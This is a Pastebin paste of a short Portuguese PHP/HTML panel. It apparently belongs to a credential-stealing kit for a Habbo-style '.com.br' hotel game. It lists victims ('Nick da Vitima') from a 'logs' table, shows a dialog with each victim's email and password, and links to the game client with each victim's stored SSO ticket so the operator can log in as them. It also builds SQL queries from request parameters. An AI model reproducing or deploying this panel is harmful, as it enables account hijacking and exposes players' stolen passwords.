Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <table width="250" height="41" border="1">
- <tr>
- <center><td width="198">Nick da Vitima</td>
- </tr>
- <?
- @include 'Cconnect.php';
- $user = $class->antisql($_GET['u']);
- $senha = $class->antisql($_GET['s']);
- $query = mysql_query("SELECT * FROM $tabela WHERE nome='".$user."' AND senha='".$senha."'");
- $mq = mysql_fetch_array($query);
- if (empty($mq)){
- die('Oi seu ip é '.$_SERVER['REMOTE_ADDR']);
- };
- ?>
- <script>function infodialog(login,senha,email){
- $('<b>Email</b>: '+login+'<br><b>Senha</b>: '+senha+'<br><b>Email adicionado</b>: '+email).dialog({modal:true});
- };
- </script>
- <td>
- <? $qqq = @mysql_query("select * from logs where owner='".$user."'");
- while ($logs = @mysql_fetch_array($qqq)) {
- echo "<a href=\"http://seu site do client /client.php?email=".$logs['sso']."&hotel=.com.br\" target=\"_blank\"><i><b style='color:green'>".$logs['nick']."</b></i></a><br>";
- };
- ?>
- </td></table>
Advertisement
Add Comment
Please, Sign In to add comment